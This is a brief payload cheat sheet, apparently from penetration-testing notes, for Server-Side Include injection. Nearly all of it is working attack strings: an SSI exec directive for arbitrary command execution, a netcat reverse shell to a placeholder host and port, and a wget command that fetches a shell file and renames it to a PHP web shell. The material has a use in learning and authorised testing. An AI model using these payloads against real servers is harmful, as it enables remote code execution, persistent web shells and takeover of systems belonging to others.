SSI
Testing for SSI
Exploitation
<!--#exec cmd="<cmd>" --> #command execution
<!--#exec cmd="nc -c bash <host> <port>" --> #reverse shell
<!--#exec cmd="wget http://<path>shell.txt | mv shell.txt shell.php" -->Last updated